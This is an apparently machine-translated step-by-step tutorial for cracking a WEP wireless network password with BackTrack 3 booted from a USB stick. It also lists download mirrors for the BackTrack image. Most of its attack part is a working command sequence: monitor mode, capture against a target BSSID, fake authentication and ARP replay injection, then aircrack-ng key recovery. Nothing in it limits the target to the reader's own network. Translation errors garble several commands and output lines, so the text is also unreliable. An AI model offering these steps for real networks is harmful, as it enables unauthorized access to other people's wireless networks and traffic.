Detailed steps for backtrack3 (bt3) USB to crack WEP wireless network password

Source: Internet
Author: User
Tags crypt bssid

1. Start to create a USB flash drive:

The downloaded backtrack3 (bt3)
USB Version (in the end of the document, unzip the file bt3b141207.rar to the USB flash drive (larger than 1 GB ).

Boot
And bt3 folders are placed in the root directory of the USB flash drive. Open the boot folder and double-click "bootinst. Bat" to run the batch file. There will be four more files in the USB flash drive ."
Isolinux. Boot "" isolinux. cfg "" isolinux. bin "" syslinux. cfg"
(If you want the bt3 menu of the Chinese section, download the bt3 Chinese Language Pack. : Http://file.mofile.com/cn/docs/listallfiles.do extraction password: 4871454552251231. (I am using a free network hard drive with many advertisements. Some of my friends may not find it carefully. I will explain the approximate location. after entering the extracted code, search for the following words (red) in the middle and the following three links. The last two links can be downloaded.
We recommend flash get to download files at high speed (IE browser) (non-IE browser)
) Decompress the "Chinese package" in the compressed package and copy the *. LZM file to the bt3/modules directory of the USB flash drive to implement the bt3 culture .)

2. restart Windows to enter BIOS settings.

Set the frist boot device in the BIOS to a USB-HDD (or a USB--ZIP) and restart the boot from USB. The system enters the backtrack3 system.

3. Start cracking now

1. Enter the ifconfig command in the shell window., The following information is displayed:

Lo no wireless extensions.
Eth0 no wireless extensions.
Eth1 IEEE 802.11g Essid: "" nickname :""
Mode :( ......) frequency: 2.452 GHz Access Point: 00: 0f: B5: 88: AC: 82
Bit Rate: 0 kb/s TX-Power: 18 dBm sensiti.pdf = 0/3
Retry: Off RTS thr: Off fragment thr: Off
Encryption key: Off
Power Management: Off
Link quality = 0/94 signal level =-95 dBm noise level =-95 dBm
RX invalid nwid: 0 RX invalid crypt: 0 RX invalid frag: 0
TX excessive retries: 0 invalid MISC: 0 missed Beacon: 0

2. Find your wireless network card name
Here I am eth1. then start your Nic In moniter mode (enter airmon-ng start eth1 11 ). EnterIfconfigCommand to return the following information:

Lo no wireless extensions.
Eth0 no wireless extensions.
Eth1 IEEE 802.11g Essid: "" nickname :""
Mode: Monitor frequency: 2.452 GHz Access Point: 00: 0f: B5: 88: AC: 82
Bit Rate: 0 kb/s TX-Power: 18 dBm sensiti.pdf = 0/3
Retry: Off RTS thr: Off fragment thr: Off
Encryption key: Off
Power Management: Off
Link quality = 0/94 signal level =-95 dBm noise level =-95 dBm
RX invalid nwid: 0 RX invalid crypt: 0 RX invalid frag: 0
TX excessive retries: 0 invalid MISC: 0 missed Beacon: 0

3. Enter the command
Airodump-ng-C 11 -- bssid 00: 1A: 01: 8d: C3: B2-W outputs eth1.

In the command, "11" indicates the channel number to be cracked, "bssid" indicates the Mac physical address of the target, and "outputs" indicates the name of the package to be generated. Press enter to run.

4. Open another shell input.
Aireplay-ng-1 0-e targetnet-a 00: 1A: 01: 8d: C3: B2-h 00: A1: C1: D8: A5: B6 eth1

"Targetnet" indicates the target network name to be cracked. 00: 1A: 01: 8d: C3: B2 indicates the physical address of the target Mac, 00: A1: C1: D8: a5: B6 indicates the MAC address of the local Nic

5. Open another shell input.
Aireplay-ng-3-B 00: 1A: 01: 8d: C3: B2-h 00: A1: C1: D8: A5: B6 eth1

Obtain more data packets.

6. When the returned data volume reaches 10 thousand, it can be cracked..

Open another shell InputAircrack-ng-z-B 00: 1A: 01: 8d: C3: B2 outputs. Cap. If the attack fails, let the attacker capture packets until the attack is cracked.

Bt3 (backtrack3) USB Version list
Backtrack3 (bt3) USB Version list: (select a quick image)
BT download:

Torrent: http://www.remote-exploit.org/bt3b141207.rar.torrent
Http://www.offensive-security.com/bt3b141207.rar.torrent
FTP download:

Ftp://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
Ftp://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
Ftp://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
HTTP download:
Http://mirror.switch.ch/ftp/mirror/backtrack/bt3b141207.rar
Http://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
Http://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
Http://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
Http://ftp.belnet.be/mirror/backtrack/bt3b141207.rar
Http://backtrack.mick27.info/bt3b141207.rar

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.